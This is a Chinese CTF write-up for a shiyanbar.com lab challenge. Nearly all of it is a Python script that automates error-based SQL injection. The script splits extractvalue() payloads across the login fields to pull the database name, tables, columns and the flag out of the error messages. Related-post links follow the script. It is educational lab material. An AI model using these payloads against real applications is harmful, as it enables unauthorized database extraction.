实验吧——加了料的报错注入

2023-05-10 11:41:01

# -*- coding:utf8 -*-
import requests
import re

def denglu(username,password):
    # 设置代理，用于调试过程中抓包分析
    proxies = {
      "http": "http://localhost:9008",
      "https": "http://localhost:9008",
    }  
    # 组包
    header = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36",
               "Referer": "http://www.shiyanbar.com/ctf/2011",
               "Content-Type": "application/x-www-form-urlencoded",
               "Upgrade-Insecure-Requests": "1",
               
               }
    url='http://ctf5.shiyanbar.com/web/baocuo/index.php'
    session = requests.session()
    payload = {
        'username':username,
        'password':password
        }
    
    r = session.post(url, data=payload,headers = header).text
    Set_Cookie = requests.utils.dict_from_cookiejar(session.cookies)
    # 过滤有效信息，作为函数返回值
    r = r.replace("<br>XPATH syntax error: ","")
    r = r.replace("'","")
    r = r.replace("\\","")
    if "," in r:
        tmp = re.split(",",r)
        return tmp[0]
    else:
        return r
    
# 查询数据库名
database = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT database()))) or'") 
print(database)
# 查询表名称
#table = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables where TABLE_SCHEMA REGEXP 'error_based_hpf'))) or'") 
table = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables where TABLE_SCHEMA REGEXP '"+database+"'))) or'") 
print(table)
# 查询字段名
#column = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(column_name) from information_schema.KEY_COLUMN_USAGE where table_schema REGEXP database() and table_name REGEXP 'ffll44jj'))) or'")
column = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(column_name) from information_schema.KEY_COLUMN_USAGE where table_schema REGEXP database() and table_name REGEXP '"+table+"'))) or'")
print(column)
# 找到flag
#result = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT value FROM ffll44jj))) or'") 
result = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT "+column+" FROM "+table+"))) or'") 
print(result)

实验吧——加了料的报错注入

继续阅读

BJDCTF easy md50x00 brain.md0x01 复现0x02 tips

[BJDCTF2020]EasySearch

审计练习9——[BJDCTF2020]Mark loves cat

hgame2023 week2 writeupWEEK2

NSCTF web200-实验吧

NSCTF web200

MYSQL注入天书之前言 [Sqli-labs]

实验吧WEBWP(一）

CTF之堆溢出-unlink原理探究

sql注入学习——布尔盲注

buuctf [SWPU2019]Web1 1

卷妹带你学jdbc---2天冲刺Day2

Bugku-web-秋名山老司机

MyBatis Generator生成的$ sql是否存在注入风险代理商sql注入问题排查准备测试demo测试结论附录

sqli-labs第一关--报错注入练习

06、注入篇--显错注入【数字型】概述注入基础靶场后端代码